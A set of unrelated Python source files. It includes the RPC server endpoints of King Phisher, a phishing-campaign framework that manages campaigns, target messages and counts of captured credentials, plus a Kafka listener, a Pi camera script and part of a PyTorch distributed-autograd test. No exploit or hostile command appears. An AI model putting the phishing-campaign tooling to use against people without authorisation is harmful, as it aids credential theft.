An RPC method that can be used by clients to assert the status
and responsiveness of this server.
:return: This method always returns True.
:rtype: bool
"""
return True
@register_rpc('/shutdown', log_call=True)
def rpc_shutdown(handler):
"""
This method can be used to shut down the server. This function will
return; however, no subsequent requests will be processed.
.. warning::
This action will stop the server process and there is no
confirmation before it takes place.
"""
shutdown_thread = threading.Thread(target=handler.server.kp_shutdown)
shutdown_thread.start()
return
@register_rpc('/version', log_call=True)
def rpc_version(handler):
"""
Get the version information of the server. This returns a
dictionary with keys of version, version_info and rpc_api_version.
These values are provided for the client to determine
compatibility.
:return: A dictionary with version information.
:rtype: dict
"""
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
message = "an rpc request to /version was received from non-loopback IP address: {0}".format(handler.client_address[0])
rpc_logger.error(message)
raise errors.KingPhisherAPIError(message)
vinfo = {
'rpc_api_version': version.rpc_api_version,
'version': version.version,
'version_info': version.version_info._asdict()
}
return vinfo
@register_rpc('/config/get')
def rpc_config_get(handler, option_name):
"""
Retrieve a value from the server's configuration.
:param str option_name: The name of the configuration option.
:return: The option's value.
"""
if isinstance(option_name, (list, tuple)):
option_names = option_name
option_values = {}
for option_name in option_names:
if not option_name in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
option_values[option_name] = handler.config.get(option_name)
return option_values
if not option_name in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
return handler.config.get(option_name)
return
@register_rpc('/config/set')
def rpc_config_set(handler, options):
"""
Set options in the server's configuration. Any changes to the
server's configuration are not written to disk.
:param dict options: A dictionary of option names and values
"""
for option_name, option_value in options.items():
if not option_name in CONFIG_WRITEABLE:
raise errors.KingPhisherPermissionError('permission denied to write config option: ' + option_name)
handler.config.set(option_name, option_value)
return
@register_rpc('/campaign/new', database_access=True, log_call=True)
def rpc_campaign_new(handler, session, name, description=None):
"""
Create a new King Phisher campaign and initialize the database
information.
:param str name: The new campaign's name.
:param str description: The new campaign's description.
:return: The ID of the new campaign.
:rtype: int
"""
if session.query(db_models.Campaign).filter_by(name=name).count():
raise ValueError('the specified campaign name already exists')
campaign = db_models.Campaign(name=name, description=description, user_id=handler.rpc_session.user)
campaign.assert_session_has_permissions('c', handler.rpc_session)
session.add(campaign)
session.commit()
return campaign.id
@register_rpc('/campaign/alerts/is_subscribed', database_access=True, log_call=True)
def rpc_campaign_alerts_is_subscribed(handler, session, campaign_id):
"""
Check if the user is subscribed to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
:return: The alert subscription status.
:rtype: bool
"""
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=handler.rpc_session.user)
return query.count()
@register_rpc('/campaign/alerts/subscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_subscribe(handler, session, campaign_id):
"""
Subscribe to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
username = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=username)
if query.count() == 0:
subscription = db_models.AlertSubscription(campaign_id=campaign_id, user_id=username)
subscription.assert_session_has_permissions('c', handler.rpc_session)
session.add(subscription)
session.commit()
@register_rpc('/campaign/alerts/unsubscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_unsubscribe(handler, session, campaign_id):
"""
Unsubscribe from alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
username = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=username)
subscription = query.first()
if subscription:
subscription.assert_session_has_permissions('d', handler.rpc_session)
session.delete(subscription)
session.commit()
@register_rpc('/campaign/landing_page/new', database_access=True, log_call=True)
def rpc_campaign_landing_page_new(handler, session, campaign_id, hostname, page):
"""
Add a landing page for the specified campaign. Landing pages refer
to resources that when visited by a user should cause the visit
counter to be incremented.
:param int campaign_id: The ID of the campaign.
:param str hostname: The hostname which will be used to serve the request.
:param str page: The request resource.
"""
hostname = hostname.split(':', 1)[0]
page = page.lstrip('/')
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=campaign_id, hostname=hostname, page=page)
if query.count() == 0:
landing_page = db_models.LandingPage(campaign_id=campaign_id, hostname=hostname, page=page)
landing_page.assert_session_has_permissions('c', handler.rpc_session)
session.add(landing_page)
session.commit()
@register_rpc('/campaign/message/new', database_access=True, log_call=True)
def rpc_campaign_message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
"""
Record a message that has been sent as part of a campaign. These
details can be retrieved later for value substitution in template
pages.
:param int campaign_id: The ID of the campaign.
:param str email_id: The message id of the sent email.
:param str target_email: The email address that the message was sent to.
:param str first_name: The first name of the message's recipient.
:param str last_name: The last name of the message's recipient.
:param str department_name: The name of the company department that the message's recipient belongs to.
"""
department = None
if department_name is not None:
department = session.query(db_models.CompanyDepartment).filter_by(name=department_name).first()
if department is None:
department = db_models.CompanyDepartment(name=department_name)
department.assert_session_has_permissions('c', handler.rpc_session)
session.add(department)
session.commit()
message = db_models.Message()
message.id = email_id
message.campaign_id = campaign_id
message.target_email = target_email
message.first_name = first_name
message.last_name = last_name
if department is not None:
message.company_department_id = department.id
message.assert_session_has_permissions('c', handler.rpc_session)
session.add(message)
session.commit()
@register_rpc('/campaign/stats', database_access=True, log_call=True)
def rpc_campaign_stats(handler, session, campaign_id):
"""
Generate statistics regarding the specified campaign and return them in a
dictionary. The dictionary will contain the keys credentials,
credentials-unique, messages, messages-trained, visits, visits-unique.
Values whose key contains "unique" are counted uniquely by the message id
with which they are associated.
:param campaign_id: The unique ID of the campaign to generate statistics for.
:return: The statistics for the specified campaign.
:rtype: dict
"""
stats = {}
stats['credentials'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).count()
stats['credentials-unique'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).distinct(db_models.Credential.message_id).count()
stats['messages'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id).count()
stats['messages-trained'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id, trained=True).count()
stats['visits'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).count()
stats['visits-unique'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).distinct(db_models.Visit.message_id).count()
return stats
@register_rpc('/db/table/count', database_access=True)
def rpc_database_count_rows(handler, session, table_name, query_filter=None):
"""
Get a count of the rows in the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: The number of matching rows.
:rtype: int
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
columns = database_tables[table_name]
for column in query_filter.keys():
if column not in columns:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
query = session.query(table)
query = query.filter_by(**query_filter)
return query.count()
@register_rpc('/db/table/view', database_access=True)
def rpc_database_view_rows(handler, session, table_name, page=0, query_filter=None):
"""
Retrieve the rows from the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param int page: The page number to retrieve results for.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: A dictionary with columns and rows keys.
:rtype: dict
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
columns = database_tables[table_name]
for column in query_filter.keys():
if column not in columns:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
offset = page * VIEW_ROW_COUNT
# it's critical that the columns are in the order that the client is expecting
rows = []
query = session.query(table)
query = query.filter_by(**query_filter)
total_rows = query.count()
for row in query[offset:]:
if len(rows) == VIEW_ROW_COUNT:
break
if row.session_has_permissions('r', handler.rpc_session):
rows.append([getattr(row, c) for c in columns])
if not len(rows):
return None
return {'columns': columns, 'rows': rows, 'total_rows': total_rows, 'page_size': VIEW_ROW_COUNT}
@register_rpc('/db/table/delete', database_access=True, log_call=True)
def rpc_database_delete_row_by_id(handler, session, table_name, row_id):
"""
Delete the row from the table with the specified value in the id column.
If the row does not exist, no error is raised.
:param str table_name: The name of the database table to delete a row from.
:param row_id: The id value.
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
row = db_manager.get_row_by_id(session, table, row_id)
if row is None:
logger = logging.getLogger('KingPhisher.Server.API.RPC')
logger.debug("received delete request for non existing row with id {0} from table {1}".format(row_id, table_name))
return
row.assert_session_has_permissions('d', handler.rpc_session)
session.delete(row)
session.commit()
@register_rpc('/db/table/delete/multi', database_access=True, log_call=True)
def rpc_database_delete_rows_by_id(handler, session, table_name, row_ids):
"""
Delete multiple rows from a table with the specified values in the id
column. If a row id specified in *row_ids* does not exist, then it will
be skipped and no error will be thrown.
:param str table_name: The name of the database table to delete rows from.
:param list row_ids: The row ids to delete.
:return: The row ids that were deleted.
:rtype: list
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
deleted_rows = []
for row_id in row_ids:
row = db_manager.get_row_by_id(session, table, row_id)
if not row:
continue
if not row.session_has_permissions('d', handler.rpc_session):
continue
session.delete(row)
deleted_rows.append(row_id)
session.commit()
return deleted_rows
@register_rpc('/db/table/get', database_access=True)
def rpc_database_get_row_by_id(handler, session, table_name, row_id):
"""
Retrieve a row from a given table with the specified value in the
id column.
:param str table_name: The name of the database table to retrieve a row from.
:param row_id: The id value.
:return: The specified row data.
:rtype: dict
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
columns = database_tables[table_name]
row = db_manager.get_row_by_id(session, table, row_id)
if row:
row.assert_session_has_permissions('r', handler.rpc_session)
row = dict(zip(columns, (getattr(row, c) for c in columns)))
return row
@register_rpc('/db/table/insert', database_access=True)
def rpc_database_insert_row(handler, session, table_name, keys, values):
"""
Insert a new row into the specified table.
:param str table_name: The name of the database table to insert a new row into.
:param list keys: The column names of *values*.
:param list values: The values to be inserted in the row.
:return: The id of the new row that has been added.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key in keys:
if key not in database_tables[table_name]:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = table()
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('c', handler.rpc_session)
session.add(row)
session.commit()
return row.id
@register_rpc('/db/table/insert/multi', database_access=True)
def rpc_database_insert_row_multi(handler, session, table_name, keys, rows, deconflict_ids=False):
"""
Insert multiple new rows into the specified table. If *deconflict_ids* is
true, new id values will be assigned as necessary to merge the data into
the database. This function will fail if constraints for the table are
not met.
:param str table_name: The name of the database table to insert data into.
:param list keys: The column names of the values in *rows*.
:param list rows: A list of rows, each row is a list of values ordered and identified by *keys* to be inserted.
:param bool deconflict_ids: Whether to assign new id values to conflicting rows instead of raising an error.
:return: List of ids of the newly inserted rows.
:rtype: list
"""
inserted_rows = collections.deque()
if not isinstance(keys, list):
keys = list(keys)
if not isinstance(rows, list):
rows = list(rows)
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError('failed to get table object for: {0}'.format(table_name))
for key in keys:
if key not in database_tables[table_name]:
raise errors.KingPhisherAPIError('column {0} is invalid for table {1}'.format(key, table_name))
for row in rows:
if len(row) != len(keys):
raise errors.KingPhisherAPIError('row is not the same length as the number of values defined')
row = dict(zip(keys, row))
if 'id' in row and db_manager.get_row_by_id(session, table, row['id']) is not None:
if deconflict_ids:
row['id'] = None
else:
raise errors.KingPhisherAPIError('row id conflicts with an existing value')
table_row = table(**row)
table_row.assert_session_has_permissions('c', handler.rpc_session)
session.add(table_row)
inserted_rows.append(table_row)
session.commit()
return [row.id for row in inserted_rows]
@register_rpc('/db/table/set', database_access=True)
def rpc_database_set_row_value(handler, session, table_name, row_id, keys, values):
"""
Set values for a row in the specified table with an id of *row_id*.
:param str table_name: The name of the database table to set the values of the specified row.
:param tuple keys: The column names of *values*.
:param tuple values: The values to be updated in the row.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key, value in zip(keys, values):
if key not in database_tables[table_name]:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = db_manager.get_row_by_id(session, table, row_id)
if not row:
raise errors.KingPhisherAPIError("failed to get row id: {0} from table: {1}".format(row_id, table_name))
row.assert_session_has_permissions('u', handler.rpc_session)
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('u', handler.rpc_session)
session.commit()
@register_rpc('/events/is_subscribed', log_call=True)
def rpc_events_is_subscribed(handler, event_id, event_type):
"""
Check if the client is currently subscribed to the specified server event.
:param str event_id: The identifier of the event to subscribe to.
:param str event_type: A sub-type for the corresponding event.
:return: Whether or not the client is subscribed to the event.
:rtype: bool
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
if not isinstance(event_type, str):
raise errors.KingPhisherAPIError('a valid event type must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.is_subscribed(event_id, event_type)
@register_rpc('/events/subscribe', log_call=True)
def rpc_events_subscribe(handler, event_id, event_types=None, attributes=None):
"""
Subscribe the client to the specified event published by the server.
When the event is published, the specified *attributes* of it and its
corresponding id and type information will be sent to the client.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
if not event_id.startswith('db-'):
# db-<table name> events are the only ones that are valid right now
raise errors.KingPhisherAPIError('invalid event_id: ' + event_id)
table_name = event_id[3:]
table_name = table_name.replace('-', '_')
columns = database_tables.get(table_name)
if columns is None:
raise errors.KingPhisherAPIError("invalid table object: {0}".format(table_name))
for event_type in event_types:
if event_type not in ('deleted', 'inserted', 'updated'):
raise errors.KingPhisherAPIError("event type {0} is invalid for db-* events".format(event_type))
for column in attributes:
if column not in columns:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
return event_socket.subscribe(event_id, event_types=event_types, attributes=attributes)
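# For example (editor's note), a client wanting to be notified of new visits
# might call this method with event_id='db-visits', event_types=['inserted']
# and attributes=['campaign_id', 'message_id'] -- subject to the columns that
# are actually defined for the visits table in db_models.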
@register_rpc('/events/unsubscribe', log_call=True)
def rpc_events_unsubscribe(handler, event_id, event_types=None, attributes=None):
"""
Unsubscribe from an event published by the server that the client
previously subscribed to.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.unsubscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/geoip/lookup', log_call=True)
def rpc_geoip_lookup(handler, ip, lang=None):
"""
Look up an IP address in the server's GeoIP database. If the IP address
cannot be found in the database, None will be returned.
:param str ip: The IP address to look up.
:param str lang: The language to prefer for regional names.
:return: The geographic information for the specified IP address.
:rtype: dict
"""
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
return result
@register_rpc('/geoip/lookup/multi', log_call=True)
def rpc_geoip_lookup_multi(handler, ips, lang=None):
"""
Look up multiple IP addresses in the server's GeoIP database. Each IP
address that cannot be found in the database will have its result set
to None.
:param list ips: The list of IP addresses to look up.
:param str lang: The language to prefer for regional names.
:return: A dictionary containing the results keyed by the specified IP
addresses.
:rtype: dict
"""
results = {}
for ip in ips:
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
results[ip] = result
return results
@register_rpc('/login', database_access=True)
def rpc_login(handler, session, username, password, otp=None):
logger = logging.getLogger('KingPhisher.Server.Authentication')
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
logger.warning("failed login request from {0} for user {1}, (invalid source address)".format(handler.client_address[0], username))
raise ValueError('invalid source address for login')
fail_default = (False, ConnectionErrorReason.ERROR_INVALID_CREDENTIALS, None)
fail_otp = (False, ConnectionErrorReason.ERROR_INVALID_OTP, None)
if not (username and password):
logger.warning("failed login request from {0} for user {1}, (missing username or password)".format(handler.client_address[0], username))
return fail_default
if not handler.server.forked_authenticator.authenticate(username, password):
logger.warning("failed login request from {0} for user {1}, (authentication failed)".format(handler.client_address[0], username))
return fail_default
user = db_manager.get_row_by_id(session, db_models.User, username)
if not user:
logger.info('creating new user object with id: ' + username)
user = db_models.User(id=username)
session.add(user)
session.commit()
elif user.otp_secret:
if otp is None:
logger.debug("failed login request from {0} for user {1}, (missing otp)".format(handler.client_address[0], username))
return fail_otp
if not (isinstance(otp, str) and len(otp) == 6 and otp.isdigit()):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
totp = pyotp.TOTP(user.otp_secret)
now = datetime.datetime.now()
if not otp in (totp.at(now + datetime.timedelta(seconds=offset)) for offset in (0, -30, 30)):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
session_id = handler.server.session_manager.put(username)
logger.info("successful login request from {0} for user {1}".format(handler.client_address[0], username))
signals.rpc_user_logged_in.send(handler, session=session_id, name=username)
return True, ConnectionErrorReason.SUCCESS, session_id
@register_rpc('/logout', log_call=True)
def rpc_logout(handler):
rpc_session = handler.rpc_session
if rpc_session.event_socket is not None:
rpc_session.event_socket.close()
handler.server.session_manager.remove(handler.rpc_session_id)
logger = logging.getLogger('KingPhisher.Server.Authentication')
logger.info("successful logout request from {0} for user {1}".format(handler.client_address[0], rpc_session.user))
signals.rpc_user_logged_out.send(handler, session=handler.rpc_session_id, name=rpc_session.user)
@register_rpc('/plugins/list', log_call=True)
def rpc_plugins_list(handler):
"""
Return information regarding enabled plugins in the server.
:return: A dictionary representing enabled plugins and their meta-data.
:rtype: dict
"""
plugin_manager = handler.server.plugin_manager
plugins = {}
for _, plugin in plugin_manager:
plugins[plugin.name] = {
'description': plugin.formatted_description,
'name': plugin.name,
'title': plugin.title,
'version': plugin.version
}
return plugins
@register_rpc('/graphql', database_access=True)
def rpc_graphql(handler, session, query, query_vars=None):
"""
Execute a GraphQL query and return the results. If the query fails to
execute the errors returned are populated in the **errors** key of the
results dictionary. If the query executes successfully the returned data
is available in the **data** key of the results dictionary.
:param str query: The GraphQL query to execute.
:param dict query_vars: Any variables needed by the *query*.
:return: The results of the query as a dictionary.
:rtype: dict
"""
query_vars = query_vars or {}
result = graphql.schema.execute(
query,
context_value={
'plugin_manager': handler.server.plugin_manager,
'rpc_session': handler.rpc_session,
'session': session
},
variable_values=query_vars
)
errors = None
if result.errors:
errors = []
for error in result.errors:
if hasattr(error, 'message'):
errors.append(error.message)
elif hasattr(error, 'args') and error.args:
errors.append(str(error.args[0]))
else:
errors.append(repr(error))
return {'data': result.data, 'errors': errors}
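# --- Illustrative sketch (editor's addition, not part of upstream
# server_rpc.py). It shows the registration pattern used throughout this
# module; the '/example/echo' path and the method itself are hypothetical.
@register_rpc('/example/echo', log_call=True)
def rpc_example_echo(handler, message):
    """
    Return *message* unchanged. This only demonstrates how a new RPC endpoint
    is wired up with the register_rpc decorator defined above.
    """
    return message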
|
event_bus.py
|
import json
import logging
import threading
from typing import List, Type
from kafka import KafkaConsumer
from fractal.core.command_bus.command_bus import CommandBus
from fractal.core.event_sourcing.event import ReceivingEvent
from fractal.core.event_sourcing.event_bus import EventBus
from fractal.core.event_sourcing.message import Message
logger = logging.getLogger("app")
class KafkaEventBus(EventBus):
def __init__(
self,
command_bus: CommandBus,
host,
port,
username,
password,
service_name: str,
aggregate: str,
event_classes: List[Type[ReceivingEvent]],
use_thread=False,
):
listener = KafkaEventBusListener(
command_bus,
host,
port,
username,
password,
service_name,
aggregate,
event_classes,
)
if use_thread: # TODO should run in separate container
thread = threading.Thread(target=listener.run)
thread.daemon = True
thread.start()
else:
listener.run()
class KafkaEventBusListener:
def __init__(
self,
command_bus: CommandBus,
host,
port,
username,
password,
service_name: str,
aggregate: str,
event_classes,
):
self.command_bus = command_bus
self.bootstrap_servers = f"{host}:{port}"
self.event_classes = {i.__name__: i for i in event_classes}
self.service_name = service_name
self.aggregate = aggregate
def run(self):
topic = f"{self.service_name}.{self.aggregate}"
logger.info(f"Listening to RabbitMq queue: {topic}")
consumer = KafkaConsumer(topic, bootstrap_servers=self.bootstrap_servers)
for message in consumer:
logger.info(f"Received message: {message}")
message = Message(**json.loads(message.value))
event = self.event_classes[message.event](**json.loads(message.data))
logger.info("Received event: {}".format(event))
command = event.to_command()
if command:
self.command_bus.handle(command)
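# --- Illustrative note (editor's addition). The listener above expects each
# Kafka record's value to be JSON that unpacks into Message(**...), where (as
# read in run() above) "event" names a class from event_classes and "data" is
# itself a JSON string of that event's constructor arguments, roughly:
#     {"event": "UserCreated", "data": "{\"user_id\": \"42\"}"}
# A subscribing service might then wire things up like this (all names below
# are hypothetical):
#     KafkaEventBus(
#         command_bus=my_command_bus,
#         host="kafka", port=9092,
#         username="svc", password="secret",
#         service_name="users", aggregate="user",
#         event_classes=[UserCreated],
#         use_thread=True,
#     )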
|
multiproc_camera.py
|
import os
import io
import time
import multiprocessing as mp
from queue import Empty
import picamera
from PIL import Image
class QueueOutput(object):
def __init__(self, queue, finished):
self.queue = queue
self.finished = finished
self.stream = io.BytesIO()
def write(self, buf):
if buf.startswith(b'\xff\xd8'):
# New frame, put the last frame's data in the queue
size = self.stream.tell()
if size:
self.stream.seek(0)
self.queue.put(self.stream.read(size))
self.stream.seek(0)
self.stream.write(buf)
def flush(self):
self.queue.close()
self.queue.join_thread()
self.finished.set()
def do_capture(queue, finished):
with picamera.PiCamera(resolution='VGA', framerate=30) as camera:
output = QueueOutput(queue, finished)
camera.start_recording(output, format='mjpeg')
camera.wait_recording(10)
camera.stop_recording()
def do_processing(queue, finished):
while not finished.wait(0.1):
try:
stream = io.BytesIO(queue.get(False))
except Empty:
pass
else:
stream.seek(0)
image = Image.open(stream)
# Pretend it takes 0.1 seconds to process the frame; on a quad-core
# Pi this gives a maximum processing throughput of 40fps
time.sleep(0.1)
print('%d: Processing image with size %dx%d' % (
os.getpid(), image.size[0], image.size[1]))
if __name__ == '__main__':
queue = mp.Queue()
finished = mp.Event()
capture_proc = mp.Process(target=do_capture, args=(queue, finished))
processing_procs = [
mp.Process(target=do_processing, args=(queue, finished))
for i in range(4)
]
for proc in processing_procs:
proc.start()
capture_proc.start()
for proc in processing_procs:
proc.join()
capture_proc.join()
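# --- Editor's note on the shutdown handshake above: stop_recording() causes
# picamera to call QueueOutput.flush(), which closes the queue and sets the
# "finished" event; each worker polls finished.wait(0.1) and exits once the
# event is set, so any frames still queued at that moment are simply dropped.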
|
dist_autograd_test.py
|
import sys
import threading
import time
from enum import Enum
import random
import torch
import torch.nn as nn
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] record that the rpc is done on the previous rank
# and the context id sent from that rank, respectively.
# rpc_done[2] and ctx_ids[2] do the same for the rank two hops back (prev of prev).
# rpc_done[3] and ctx_ids[3] do the same for the rank three hops back.
# rpc_done[0] and ctx_ids[0] refer to the current rank, but are mostly unused.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# the rref tensor equals the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dist autograd context, runs rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except the rpc calls the torchscript
# function "my_script_ref_add" instead of the python function "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
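    # Tests that exercise error recovery (e.g. test_multiple_backward_with_errors
    # below) temporarily flip _simulate_error to False so that a later backward
    # pass can succeed, and then reset it to True.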
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
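    # Rough mapping to the call made in CommonDistAutogradTest._exec_func_with_dst
    # below (dst is the destination rank, method the target callable):
    #   LOCAL     -> method(*args)
    #   RPC_SYNC  -> rpc.rpc_sync(worker_name(dst), method, args=args)
    #   REMOTE    -> rpc.remote(worker_name(dst), method, args=args).to_here()
    #   RPC_ASYNC -> rpc.rpc_async(worker_name(dst), method, args=args).wait()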
# Common utils for both CPU and CUDA test suites
class CommonDistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
        elif ExecMode.RPC_SYNC == exec_mode:
            return rpc.rpc_sync(worker_name(dst), method, args=args)
        elif ExecMode.REMOTE == exec_mode:
            return rpc.remote(worker_name(dst), method, args=args).to_here()
        elif ExecMode.RPC_ASYNC == exec_mode:
            fut = rpc.rpc_async(worker_name(dst), method, args=args)
            return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
